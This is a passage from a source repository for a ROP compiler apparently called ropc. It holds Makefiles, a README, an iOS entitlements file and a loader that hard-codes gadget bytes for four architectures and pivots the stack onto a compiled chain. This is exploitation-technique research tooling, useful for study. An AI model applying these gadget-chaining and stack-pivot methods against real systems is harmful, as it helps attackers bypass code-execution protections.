-DBITS=32 -E $< 32 | 33 | 34 | rop-arm64: wrap-arm64.asm rop-arm64.asm 35 | nasm -o $@ -O6 $< 36 | 37 | rop-arm64.asm: rop-arm64.i 38 | ./ropc-arm64 -o $@ -O2 -g -n -c dyld_shared_cache_arm64 $< 39 | 40 | rop-arm64.i: rope.c 41 | gcc -o $@ -DBITS=64 -DARM64 -E $< 42 | 43 | 44 | clean: 45 | -$(RM) rop-x86.asm rop-x86_64.asm rop-arm.asm rop-arm64.asm 46 | -$(RM) rop-x86.i rop-x86_64.i rop-arm.i rop-arm64.i 47 | 48 | distclean: clean 49 | -$(RM) rop-x86 rop-x86_64 rop-arm rop-arm64 50 | -------------------------------------------------------------------------------- /sample/Makefile.dry: -------------------------------------------------------------------------------- 1 | all: rop-x86.asm rop-x86_64.asm rop-arm.asm rop-arm64.asm 2 | 3 | 4 | rop-x86.asm: rop-x86.i 5 | ./ropc-x86 -o $@ -O2 -g -n $< 6 | 7 | rop-x86.i: rope.c 8 | gcc -o $@ -DBITS=32 -E $< 9 | 10 | 11 | rop-x86_64.asm: rop-x86_64.i 12 | ./ropc-x86_64 -o $@ -O2 -g -n $< 13 | 14 | rop-x86_64.i: rope.c 15 | gcc -o $@ -DBITS=64 -E $< 16 | 17 | 18 | rop-arm.asm: rop-arm.i 19 | ./ropc-arm -o $@ -O2 -g -n $< 20 | 21 | rop-arm.i: rope.c 22 | gcc -o $@ -DBITS=32 -E $< 23 | 24 | 25 | rop-arm64.asm: rop-arm64.i 26 | ./ropc-arm64 -o $@ -O2 -g -n $< 27 | 28 | rop-arm64.i: rope.c 29 | gcc -o $@ -DBITS=64 -DARM64 -E $< 30 | 31 | 32 | clean: 33 | -$(RM) rop-x86.asm rop-x86_64.asm rop-arm.asm rop-arm64.asm 34 | -$(RM) rop-x86.i rop-x86_64.i rop-arm.i rop-arm64.i 35 | 36 | distclean: clean 37 | -------------------------------------------------------------------------------- /sample/Makefile.linux: -------------------------------------------------------------------------------- 1 | CFLAGS = -Wall -W -pedantic -O2 -fpie -pie 2 | LDFLAGS = -z,now 3 | LDLIBS = -ldl 4 | 5 | all: loader-x86 loader-x86_64 6 | 7 | loader-x86: loader.c 8 | gcc -o $@ -m32 $(CFLAGS) -Wl,$(LDFLAGS) $< $(LDLIBS) 9 | 10 | loader-x86_64: loader.c 11 | gcc -o $@ -m64 $(CFLAGS) -Wl,$(LDFLAGS) $< $(LDLIBS) 12 | 13 | clean: 14 | 15 | distclean: clean 16 | 
-$(RM) loader-x86 loader-x86_64 17 | -------------------------------------------------------------------------------- /sample/Makefile.macos: -------------------------------------------------------------------------------- 1 | CFLAGS = -Wall -W -pedantic -O2 2 | LDFLAGS = -bind_at_load 3 | 4 | all: loader-x86 loader-x86_64 loader-arm loader-arm64 5 | 6 | loader-x86: loader-x86.o 7 | ld -o $@ -demangle -dynamic -arch i386 -macosx_version_min 10.14.0 $(LDFLAGS) $< -lc 8 | 9 | loader-x86.o: loader.c 10 | gcc -o $@ -m32 $(CFLAGS) -c $< 11 | 12 | loader-x86_64: loader.c 13 | gcc -o $@ -m64 $(CFLAGS) -Wl,$(LDFLAGS) $< 14 | 15 | loader-arm: loader.c 16 | clang -arch armv7 -isysroot /usr/local/share/SDKs/iPhoneOS7.0.sdk -o $@ $(CFLAGS) -Wl,$(LDFLAGS) $< 17 | ldid -Sent.xml $@ 18 | 19 | loader-arm64: loader.c 20 | clang -arch arm64 -isysroot /usr/local/share/SDKs/iPhoneOS7.0.sdk -o $@ $(CFLAGS) -Wl,$(LDFLAGS) $< 21 | ldid2 -Sent.xml $@ 22 | 23 | clean: 24 | -$(RM) loader-x86.o 25 | 26 | distclean: clean 27 | -$(RM) loader-x86 loader-x86_64 loader-arm loader-arm64 28 | -------------------------------------------------------------------------------- /sample/README: -------------------------------------------------------------------------------- 1 | 1. Build the rop compilers: 2 | $ Build.sh [x86] [x86_64] [arm] [arm64] [all] 3 | 4 | You should end up with a bunch of rop compilers: 5 | ropc-x86 ropc-x86_64 ropc-arm ropc-arm64 6 | 7 | 8 | 2. Build the loaders: 9 | $ make -f Makefile.macos [loader-x86] [loader-x86_64] [loader-arm] [loader-arm64] 10 | or 11 | $ make -f Makefile.linux [loader-x86] [loader-x86_64] 12 | 13 | You should end up with a bunch of loaders: 14 | loader-x86 loader-x86_64 loader-arm loader-arm64 15 | 16 | NB: all loaders can be PIE or non-PIE, it doesn't really matter 17 | 18 | 19 | 3. 
Create links for the shared cache, to link the rop strip against: 20 | dyld_shared_cache_i386 -> /var/db/dyld/dyld_shared_cache_i386 21 | dyld_shared_cache_x86_64 -> /var/db/dyld/dyld_shared_cache_x86_64h 22 | dyld_shared_cache_armv7 -> /S/L/C/com.apple.dyld/dyld_shared_cache_armv7s 23 | dyld_shared_cache_arm64 -> /S/L/C/com.apple.dyld/dyld_shared_cache_arm64 24 | or (Linux) 25 | dyld_shared_cache_i386 -> /lib/libc-2.23.so 26 | dyld_shared_cache_x86_64 -> /lib64/libc-2.23.so 27 | ... 28 | or (testing) 29 | dyld_shared_cache_i386 -> loader-x86 30 | dyld_shared_cache_x86_64 -> loader-x86_64 31 | dyld_shared_cache_armv7 -> loader-arm 32 | dyld_shared_cache_arm64 -> loader-arm64 33 | 34 | NB: you can use the respective loader-??? as a "shared cache" since it has 35 | all the needed gadgets, but you'd have to match the rope.c imports with the 36 | loader's exports. Also, in this case, all the loaders should be bind-now, 37 | to avoid dynamic symbol resolution, otherwise each function call may eat up 38 | a *lot* of stack space, likely resulting in a crash. Such chains *must* be 39 | run with -self parameter, because they need the loader (not the lib) slide. 40 | 41 | 42 | 4. Build the rop strips: 43 | $ make [rop-x86] [rop-x86_64] [rop-arm] [rop-arm64] 44 | 45 | You should end up with a bunch of rop strips: 46 | rop-x86 rop-x86_64 rop-arm rop-arm64 47 | 48 | 49 | 5. 
Run the strips: 50 | ./loader-x86_64 [-self] rop-x86_64 51 | -------------------------------------------------------------------------------- /sample/dyld_shared_cache_arm64: -------------------------------------------------------------------------------- 1 | /System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64 -------------------------------------------------------------------------------- /sample/dyld_shared_cache_armv7: -------------------------------------------------------------------------------- 1 | /System/Library/Caches/com.apple.dyld/dyld_shared_cache_armv7s -------------------------------------------------------------------------------- /sample/dyld_shared_cache_i386: -------------------------------------------------------------------------------- 1 | /var/db/dyld/dyld_shared_cache_i386 -------------------------------------------------------------------------------- /sample/dyld_shared_cache_x86_64: -------------------------------------------------------------------------------- 1 | /var/db/dyld/dyld_shared_cache_x86_64h -------------------------------------------------------------------------------- /sample/ent.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | platform-application 6 | 7 | get-task-allow 8 | 9 | task_for_pid-allow 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /sample/loader.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #ifdef __APPLE__ 13 | #include 14 | #endif 15 | 16 | #define SPACE 0x10000 17 | 18 | #define GADGET(name, insns) \ 19 | extern char name[]; \ 20 | __asm(".p2align 2\n" \ 21 | ".globl _gadget_" #name "\n" \ 22 | "_gadget_" #name ":\n" \ 23 | insns) 24 | 25 | #ifdef __x86_64__ 26 | GADGET(LDR_RAX, 27 | ".byte 
0x58, 0xC3\n" 28 | ); 29 | GADGET(LDR_RCX, 30 | ".byte 0x59, 0xC3\n" 31 | ); 32 | GADGET(LDR_RDX, 33 | ".byte 0x5A, 0xC3\n" 34 | ); 35 | GADGET(LDR_RBX, 36 | ".byte 0x5B, 0xC3\n" 37 | ); 38 | GADGET(LDR_RBP, 39 | ".byte 0x5D, 0xC3\n" 40 | ); 41 | GADGET(LDR_RSI, 42 | ".byte 0x5E, 0xC3\n" 43 | ); 44 | GADGET(LDR_RDI, 45 | ".byte 0x5F, 0xC3\n" 46 | ); 47 | GADGET(LDR_R8, 48 | ".byte 0x41, 0x58, 0xC3\n" 49 | ); 50 | GADGET(LDR_R9, 51 | ".byte 0x41, 0x59, 0xC3\n" 52 | ); 53 | GADGET(LDR_RAX_RAX, 54 | ".byte 0x48, 0x8B, 0x00, 0xC3\n" 55 | ); 56 | GADGET(STR_RAX_RBX, 57 | ".byte 0x48, 0x89, 0x03, 0x5B, 0xC3\n" 58 | ".byte 0x48, 0x89, 0x03, 0x48, 0x83, 0xC4, 0x08, 0x5B, 0x5D, 0xC3\n" 59 | ); 60 | GADGET(MOV_RDI_RAX, 61 | ".byte 0x48, 0x89, 0xC7, 0x48, 0x89, 0xF8, 0x5D, 0xC3\n" 62 | ".byte 0x48, 0x89, 0xC7, 0x5B, 0x5D, 0x41, 0x5C, 0xFF, 0xE1\n" // XXX 63 | ".byte 0x48, 0x89, 0xC7, 0x48, 0x8B, 0x49, 0x08, 0xFF, 0xE1\n" 64 | ); 65 | GADGET(MOV_RAX_RDI, 66 | ".byte 0x48, 0x89, 0xF8, 0xC3\n" 67 | ); 68 | GADGET(OR_RAX_reg, 69 | ".byte 0x48, 0x09, 0xD0, 0xC3\n" 70 | ".byte 0x48, 0x09, 0xD0, 0x5D, 0xC3\n" 71 | ); 72 | GADGET(XOR_RAX_reg, 73 | ".byte 0x48, 0x31, 0xD0, 0xC3\n" 74 | ); 75 | GADGET(AND_RAX_reg, 76 | ".byte 0x48, 0x21, 0xF0, 0x5D, 0xC3\n" 77 | ".byte 0x48, 0x21, 0xD0, 0x66, 0x48, 0x0F, 0x6E, 0xC0, 0xC3\n" 78 | ); 79 | GADGET(ADD_RAX_reg, 80 | ".byte 0x48, 0x01, 0xC8, 0xC3\n" 81 | ".byte 0x48, 0x01, 0xD0, 0x5D, 0xC3\n" 82 | ); 83 | GADGET(SUB_RAX_reg, 84 | ".byte 0x48, 0x29, 0xD0, 0xC3\n" 85 | ".byte 0x48, 0x29, 0xC8, 0x5D, 0xC3\n" 86 | ); 87 | GADGET(MUL_RAX_reg, 88 | ".byte 0x48, 0xF7, 0xE6, 0x4C, 0x01, 0xC2, 0xC3\n" 89 | ".byte 0x48, 0xF7, 0xE2, 0x4C, 0x01, 0xC2, 0x48, 0x01, 0xFA, 0xC3\n" 90 | ); 91 | GADGET(DIV_RAX_reg, 92 | ".byte 0x48, 0xF7, 0xF3, 0x5B, 0x5D, 0xC3\n" 93 | ".byte 0x48, 0xF7, 0xF1, 0x48, 0x0F, 0xAF, 0xC7, 0xEB, 0x02, 0x31, 0xC0, 0x5D, 0xC3\n" 94 | ); 95 | GADGET(MUL_RAX_TWO, 96 | ".byte 0x48, 0x8D, 0x44, 0x00, 0xFF, 0xC3\n" 97 | ); 98 | 
GADGET(BLR_RAX, 99 | ".byte 0xFF, 0xD0, 0x48, 0x83, 0xC4, 0x20, 0x5D, 0xC3\n" 100 | ".byte 0xFF, 0xD0, 0x48, 0x83, 0xC4, 0x38, 0xC3\n" 101 | ); 102 | GADGET(COMMUTE, 103 | ".byte 0x48, 0x89, 0xEC, 0x5D, 0xC3\n" 104 | ".byte 0xC9, 0xC3\n" 105 | ); 106 | GADGET(SELECT, 107 | ".byte 0x48, 0x85, 0xC0, 0x48, 0x89, 0xD0, 0x48, 0x0F, 0x44, 0xC3, 0x5B, 0xC3\n" 108 | ".byte 0x48, 0x85, 0xC0, 0x48, 0x0F, 0x44, 0xCA, 0x48, 0x89, 0xC8, 0x5B, 0x41, 0x5C, 0x41, 0x5E, 0x41, 0x5F, 0x5D, 0xC3\n" 109 | ); 110 | #elif defined(__i386__) 111 | GADGET(LDR_EAX, 112 | ".byte 0x58, 0xC3\n" 113 | ); 114 | GADGET(LDR_ECX, 115 | ".byte 0x59, 0xC3\n" 116 | ); 117 | GADGET(LDR_EDX, 118 | ".byte 0x5A, 0xC3\n" 119 | ".byte 0x5A, 0x5D, 0xC3\n" 120 | ); 121 | GADGET(LDR_EBX, 122 | ".byte 0x5B, 0xC3\n" 123 | ); 124 | GADGET(LDR_EBP, 125 | ".byte 0x5D, 0xC3\n" 126 | ); 127 | GADGET(LDR_ESI, 128 | ".byte 0x5E, 0xC3\n" 129 | ); 130 | GADGET(LDR_EDI, 131 | ".byte 0x5F, 0xC3\n" 132 | ); 133 | GADGET(LDR_EAX_EAX, 134 | ".byte 0x8B, 0x00, 0xC3\n" 135 | ); 136 | GADGET(STR_EAX_ECX, 137 | ".byte 0x89, 0x01, 0xC3\n" 138 | ".byte 0x89, 0x01, 0x5B, 0xC3\n" 139 | ); 140 | GADGET(MOV_EDX_EAX, 141 | ".byte 0x89, 0xC2, 0xC3\n" 142 | ".byte 0x89, 0xC2, 0x5B, 0x89, 0xD0, 0x5E, 0x5F, 0x5D, 0xC3\n" 143 | ); 144 | GADGET(MOV_EAX_EDX, 145 | ".byte 0x89, 0xD0, 0xC3\n" 146 | ); 147 | GADGET(OR_EAX_reg, 148 | ".byte 0x09, 0xC8, 0x5D, 0xC3\n" 149 | ".byte 0x09, 0xC8, 0x5B, 0xC3\n" 150 | ); 151 | GADGET(XOR_EAX_reg, 152 | ".byte 0x31, 0xC8, 0xC3\n" 153 | ); 154 | GADGET(AND_EAX_reg, 155 | ".byte 0x21, 0xC8, 0xC3\n" 156 | ".byte 0x21, 0xC8, 0x5D, 0xC3\n" 157 | ); 158 | GADGET(ADD_EAX_reg, 159 | ".byte 0x01, 0xC8, 0xC3\n" 160 | ); 161 | GADGET(SUB_EAX_reg, 162 | ".byte 0x29, 0xC8, 0xC3\n" 163 | ); 164 | GADGET(MUL_EAX_reg, 165 | ".byte 0xF7, 0xE2, 0x01, 0xCB, 0x01, 0xDA, 0x5B, 0xC3\n" 166 | ); 167 | GADGET(DIV_EAX_reg, 168 | ".byte 0xF7, 0xF1, 0x89, 0xDA, 0x5B, 0xC3\n" 169 | ".byte 0xF7, 0xF6, 0x5B, 0x5E, 0x5F, 0x01, 0xC8, 
0xC3\n" 170 | ); 171 | GADGET(MUL_EAX_TWO, 172 | ".byte 0x8D, 0x44, 0x00, 0xFF, 0xC3\n" 173 | ); 174 | GADGET(BLR_EAX_2, 175 | ".byte 0xFF, 0xD0, 0x83, 0xC4, 0x08, 0x5D, 0xC3\n" 176 | ".byte 0xFF, 0xD0, 0x83, 0xC4, 0x0C, 0xC3\n" 177 | ); 178 | GADGET(BLR_EAX_6, 179 | ".byte 0xFF, 0xD0, 0x83, 0xC4, 0x18, 0x5D, 0xC3\n" 180 | ".byte 0xFF, 0xD0, 0x83, 0xC4, 0x1C, 0xC3\n" 181 | ); 182 | GADGET(BLR_EAX_16, 183 | ".byte 0xFF, 0xD0, 0x83, 0xC4, 0x40, 0x5E, 0x5F, 0x5D, 0xC3\n" 184 | ); 185 | GADGET(COMMUTE, 186 | ".byte 0x89, 0xEC, 0x5D, 0xC3\n" 187 | ); 188 | GADGET(SELECT, 189 | ".byte 0x85, 0xC0, 0x0F, 0x45, 0xF1, 0x89, 0xF0, 0x83, 0xC4, 0x0C, 0x5E, 0x5F, 0x5B, 0x5D, 0xC3\n" 190 | ".byte 0x8B, 0x04, 0x90, 0xC3\n" 191 | ); 192 | GADGET(NOT_EAX, 193 | ".byte 0x85, 0xC0, 0x0F, 0x94, 0xC0, 0x0F, 0xB6, 0xC0, 0xC3\n" 194 | ); 195 | #elif defined(__arm64__) 196 | GADGET(LDR_X0, 197 | ".byte 0xE0, 0x03, 0x40, 0xF9, 0x00, 0x01, 0x3F, 0xD6\n" 198 | ); 199 | GADGET(LDR_X1, 200 | ".byte 0xE1, 0x03, 0x40, 0xF9, 0x00, 0x01, 0x3F, 0xD6\n" 201 | ); 202 | GADGET(LDR_X2, 203 | ".byte 0xE2, 0x03, 0x40, 0xF9, 0x00, 0x01, 0x3F, 0xD6\n" 204 | ); 205 | GADGET(LDR_X3, 206 | ".byte 0xE3, 0x03, 0x40, 0xF9, 0x00, 0x01, 0x3F, 0xD6\n" 207 | ); 208 | GADGET(LDR_X19, 209 | ".byte 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 210 | ); 211 | GADGET(LDR_X29, 212 | ".byte 0xFD, 0x7B, 0xC1, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 213 | ); 214 | GADGET(RET_X8, 215 | ".byte 0xE8, 0x07, 0x40, 0xF9, 0x00, 0x01, 0x3F, 0xD6\n" 216 | ); 217 | GADGET(LDR_X0_X0, 218 | ".byte 0x00, 0x00, 0x40, 0xF9, 0x00, 0x01, 0x3F, 0xD6\n" 219 | ); 220 | GADGET(STR_X0_X19, 221 | ".byte 0x60, 0x02, 0x00, 0xF9, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 222 | ); 223 | GADGET(MOV_X1_X0, 224 | ".byte 0xE1, 0x03, 0x00, 0xAA, 0x00, 0x01, 0x3F, 0xD6\n" 225 | ); 226 | GADGET(MOV_X0_X1, 227 | ".byte 0xE0, 0x03, 0x01, 0xAA, 0x00, 0x01, 0x3F, 0xD6\n" 228 | ); 229 | GADGET(OR_X0_reg, 230 | 
".byte 0x00, 0x00, 0x13, 0xAA, 0xFD, 0x7B, 0x42, 0xA9, 0xF4, 0x4F, 0x41, 0xA9, 0xFF, 0xC3, 0x00, 0x91, 0xC0, 0x03, 0x5F, 0xD6\n" 231 | ".byte 0x00, 0x00, 0x13, 0xAA, 0xBF, 0x43, 0x00, 0xD1, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 232 | ".byte 0x20, 0x00, 0x00, 0xAA, 0xC0, 0x03, 0x5F, 0xD6\n" 233 | ); 234 | GADGET(XOR_X0_reg, 235 | ".byte 0x00, 0x00, 0x13, 0xCA, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 236 | ); 237 | GADGET(AND_X0_reg, 238 | ".byte 0x20, 0x00, 0x00, 0x8A, 0xFD, 0x7B, 0x42, 0xA9, 0xFF, 0xC3, 0x00, 0x91, 0xC0, 0x03, 0x5F, 0xD6\n" 239 | ".byte 0x00, 0x00, 0x13, 0x8A, 0xBF, 0x43, 0x00, 0xD1, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 240 | ); 241 | GADGET(ADD_X0_reg, 242 | ".byte 0x00, 0x00, 0x01, 0x8B, 0xFD, 0x7B, 0xC1, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 243 | ); 244 | GADGET(SUB_X0_reg, 245 | ".byte 0x00, 0x00, 0x01, 0xCB, 0xFD, 0x7B, 0xC1, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 246 | ".byte 0x00, 0x00, 0x01, 0xCB, 0xFD, 0x7B, 0x41, 0xA9, 0xFF, 0x83, 0x00, 0x91, 0xC0, 0x03, 0x5F, 0xD6\n" 247 | ); 248 | GADGET(MUL_X0_reg, 249 | ".byte 0x00, 0x7C, 0x13, 0x9B, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 250 | ); 251 | GADGET(DIV_X0_reg, 252 | ".byte 0x00, 0x08, 0xD3, 0x9A, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 253 | ".byte 0x00, 0x08, 0xD3, 0x9A, 0x02, 0x00, 0x00, 0x14, 0x00, 0x00, 0x80, 0xD2, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 254 | ".byte 0x00, 0x08, 0xC1, 0x9A, 0xC0, 0x03, 0x5F, 0xD6\n" 255 | ); 256 | GADGET(BR_X3, 257 | ".byte 0xFD, 0x7B, 0xC1, 0xA8, 0x60, 0x00, 0x1F, 0xD6\n" 258 | ); 259 | GADGET(BR_X16, 260 | ".byte 0xF0, 0x03, 0x00, 0xAA, 0xE7, 0x1B, 0xC1, 0xA8, 0xE5, 0x13, 0xC1, 0xA8, 0xE3, 0x0B, 0xC1, 0xA8, 0xE1, 0x03, 0xC1, 0xA8, 0xFD, 0x7B, 0xC1, 0xA8, 0x00, 0x02, 0x1F, 0xD6\n" 261 | ); 262 | GADGET(BLR_X19, 263 | ".byte 0x60, 0x02, 0x3F, 0xD6, 0xFD, 
0x7B, 0x42, 0xA9, 0xF4, 0x4F, 0x41, 0xA9, 0xF6, 0x57, 0xC3, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 264 | ); 265 | GADGET(COMMUTE, 266 | ".byte 0xBF, 0x03, 0x00, 0x91, 0xFD, 0x7B, 0xC1, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 267 | ); 268 | GADGET(NOT_X0, 269 | ".byte 0x1F, 0x00, 0x00, 0xF1, 0xE0, 0x17, 0x9F, 0x1A, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 270 | ); 271 | GADGET(SEL_1, 272 | ".byte 0x73, 0x12, 0x9F, 0x9A, 0xE0, 0x03, 0x13, 0xAA, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 273 | ".byte 0x73, 0x12, 0x9F, 0x9A, 0xE0, 0x03, 0x13, 0xAA, 0xFD, 0x7B, 0x42, 0xA9, 0xF4, 0x4F, 0x41, 0xA9, 0xF6, 0x57, 0xC3, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 274 | ".byte 0x73, 0x12, 0x9F, 0x9A, 0xE0, 0x03, 0x13, 0xAA, 0xFD, 0x7B, 0x42, 0xA9, 0xF4, 0x4F, 0x41, 0xA9, 0xFF, 0xC3, 0x00, 0x91, 0xC0, 0x03, 0x5F, 0xD6\n" 275 | ); 276 | GADGET(SEL_2, 277 | ".byte 0x73, 0x02, 0x80, 0x9A, 0xE0, 0x03, 0x13, 0xAA, 0xFD, 0x7B, 0x41, 0xA9, 0xF4, 0x4F, 0xC2, 0xA8, 0xC0, 0x03, 0x5F, 0xD6\n" 278 | ); 279 | GADGET(PIVOT, 280 | ".byte 0x3F, 0x00, 0x00, 0x91, 0x00, 0x00, 0x1F, 0xD6\n" 281 | ); 282 | #elif defined(__arm__) 283 | GADGET(LDR_R0, 284 | ".byte 0x01, 0xBD\n" 285 | ); 286 | GADGET(LDR_R0R1, 287 | ".byte 0x03, 0xBD\n" 288 | ); 289 | GADGET(LDR_R0TO3, 290 | ".byte 0x0F, 0xBD\n" 291 | ".p2align 2\n" 292 | ".byte 0x0F, 0x80, 0xBD, 0xE8\n" 293 | ); 294 | GADGET(LDR_R4, 295 | ".byte 0x10, 0xBD\n" 296 | ); 297 | GADGET(LDR_R4R5, 298 | ".byte 0x30, 0xBD\n" 299 | ); 300 | GADGET(LDR_R7, 301 | ".byte 0x80, 0xBD\n" 302 | ".byte 0xBD, 0xE8, 0x80, 0x80\n" 303 | ".byte 0x80, 0xBC, 0x5D, 0xF8, 0x04, 0xEB, 0x70, 0x47\n" 304 | ".p2align 2\n" 305 | ".byte 0x80, 0x80, 0xBD, 0xE8\n" 306 | ); 307 | GADGET(LDR_R0_R0, 308 | ".byte 0x00, 0x68, 0x80, 0xBD\n" 309 | ); 310 | GADGET(STR_R0_R4, 311 | ".byte 0x20, 0x60, 0x90, 0xBD\n" 312 | ); 313 | GADGET(MOV_R1_R0, 314 | ".byte 0x01, 0x46, 0x90, 0xBD\n" 315 | ".byte 0x01, 0x46, 0x08, 0x46, 0x80, 0xBD\n" 316 | ".byte 0x01, 
0x46, 0x80, 0xBD\n" 317 | ); 318 | GADGET(MOV_R0_R1, 319 | ".byte 0x08, 0x46, 0x80, 0xBD\n" 320 | ".byte 0x08, 0x46, 0x90, 0xBD\n" 321 | ); 322 | GADGET(OR_R0_R1, 323 | ".byte 0x08, 0x43, 0x80, 0xBD\n" 324 | ); 325 | GADGET(XOR_R0_R1, 326 | ".byte 0x48, 0x40, 0x80, 0xBD\n" 327 | ); 328 | GADGET(AND_R0_R1, 329 | ".byte 0x08, 0x40, 0x80, 0xBD\n" 330 | ); 331 | GADGET(ADD_R0_R1, 332 | ".byte 0x08, 0x44, 0x80, 0xBD\n" 333 | ); 334 | GADGET(SUB_R0_R1, 335 | ".byte 0x40, 0x1A, 0x80, 0xBD\n" 336 | ); 337 | GADGET(MUL_R0_R1, 338 | ".byte 0x48, 0x43, 0x80, 0xBD\n" 339 | ); 340 | GADGET(DIV_R0_R1, 341 | ".byte 0xB0, 0xFB, 0xF1, 0xF0, 0x90, 0xBD\n" 342 | ".byte 0xB0, 0xFB, 0xF1, 0xF0, 0xB0, 0xBD\n" 343 | ); 344 | GADGET(BLX_R4, 345 | ".byte 0xA0, 0x47, 0x90, 0xBD\n" 346 | ); 347 | GADGET(BLX_R4_1, 348 | ".byte 0xA0, 0x47, 0x01, 0xB0, 0x90, 0xBD\n" 349 | ); 350 | GADGET(BLX_R4_2, 351 | ".byte 0xA0, 0x47, 0x02, 0xB0, 0x90, 0xBD\n" 352 | ); 353 | GADGET(BLX_R4_3, 354 | ".byte 0xA0, 0x47, 0x03, 0xB0, 0x90, 0xBD\n" 355 | ); 356 | GADGET(BLX_R4_4, 357 | ".byte 0xA0, 0x47, 0x04, 0xB0, 0x90, 0xBD\n" 358 | ); 359 | GADGET(BLX_R4_5, 360 | ".byte 0xA0, 0x47, 0x05, 0xB0, 0x90, 0xBD\n" 361 | ); 362 | GADGET(BLX_R4_6, 363 | ".byte 0xA0, 0x47, 0x06, 0xB0, 0x90, 0xBD\n" 364 | ); 365 | GADGET(COMMUTE, 366 | ".byte 0xBD, 0x46, 0x80, 0xBD\n" 367 | ".byte 0xBD, 0x46, 0xBD, 0xE8, 0x80, 0x80\n" 368 | ".byte 0xBD, 0x46, 0x80, 0xBC, 0x5D, 0xF8, 0x04, 0xEB, 0x70, 0x47\n" 369 | ".p2align 2\n" 370 | ".byte 0x07, 0xD0, 0xA0, 0xE1, 0x80, 0x80, 0xBD, 0xE8\n" 371 | ); 372 | GADGET(SELECT, 373 | ".byte 0x00, 0x28, 0x08, 0xBF, 0x2C, 0x46, 0x20, 0x46, 0xB0, 0xBD\n" 374 | ); 375 | GADGET(LDMIA_R0, 376 | ".byte 0x11, 0xA0, 0x90, 0xE8\n" 377 | ".byte 0x90, 0xE8, 0x11, 0xA0\n" 378 | ); 379 | #endif 380 | 381 | pid_t 382 | getpid_(void) 383 | { 384 | return getpid(); 385 | } 386 | 387 | int 388 | printf_(const char *fmt, ...) 
389 | { 390 | int rv; 391 | va_list ap; 392 | va_start(ap, fmt); 393 | rv = vprintf(fmt, ap); 394 | va_end(ap); 395 | return rv; 396 | } 397 | 398 | void 399 | exit_(int status) 400 | { 401 | exit(status); 402 | } 403 | 404 | static void __attribute__((noreturn)) 405 | pivot(char *addr) 406 | { 407 | #ifdef __x86_64__ 408 | __asm __volatile( 409 | "movq %0, %%rsp;" 410 | "popq %%rbp;" 411 | "retq" 412 | ::"X"(addr)); 413 | #elif defined(__i386__) 414 | __asm __volatile( 415 | "movl %0, %%esp;" 416 | "popl %%ebp;" 417 | "ret" 418 | ::"X"(addr)); 419 | #elif defined(__arm64__) 420 | __asm __volatile("\n\ 421 | mov sp, %0\n\ 422 | ldp x29, x30, [sp], 0x10\n\ 423 | ret\n\ 424 | "::"r"(addr)); 425 | #elif defined(__arm__) 426 | __asm __volatile("\n\ 427 | mov sp, %0\n\ 428 | pop {r7, pc}\n\ 429 | "::"r"(addr)); 430 | #endif 431 | __builtin_trap(); 432 | } 433 | 434 | int 435 | main(int argc, char **argv) 436 | { 437 | int rv; 438 | int fd; 439 | char *buf; 440 | ssize_t sz; 441 | struct stat st; 442 | uintptr_t *end, slide = 0; 443 | const char *filename = "rope.bin"; 444 | 445 | if (argc > 1 && !strcmp(argv[1], "-self")) { 446 | #if defined(__linux__) && (defined(__pic__) || defined(__PIC__) || defined(__pie__) || defined(__PIE__)) 447 | Dl_info info; 448 | rv = dladdr((void *)main, &info); 449 | if (rv) { 450 | slide = (uintptr_t)info.dli_fbase; 451 | } 452 | #endif 453 | #ifdef __APPLE__ 454 | slide = _dyld_get_image_vmaddr_slide(0); 455 | #endif 456 | argc--; 457 | argv++; 458 | } else { 459 | #if defined(__linux__) 460 | slide = (uintptr_t)dlsym(RTLD_NEXT, "getpid"); 461 | if (slide) { 462 | for (slide &= ~0xFFF; *(unsigned int *)slide != 0x464C457F; slide -= 0x1000) { 463 | continue; 464 | } 465 | } 466 | #endif 467 | #ifdef __APPLE__ 468 | slide = _dyld_get_image_vmaddr_slide(1); 469 | #endif 470 | } 471 | if (argc > 1) { 472 | filename = argv[1]; 473 | } 474 | 475 | fd = open(filename, O_RDONLY); 476 | if (fd == -1) { 477 | perror("open"); 478 | return -1; 479 | 
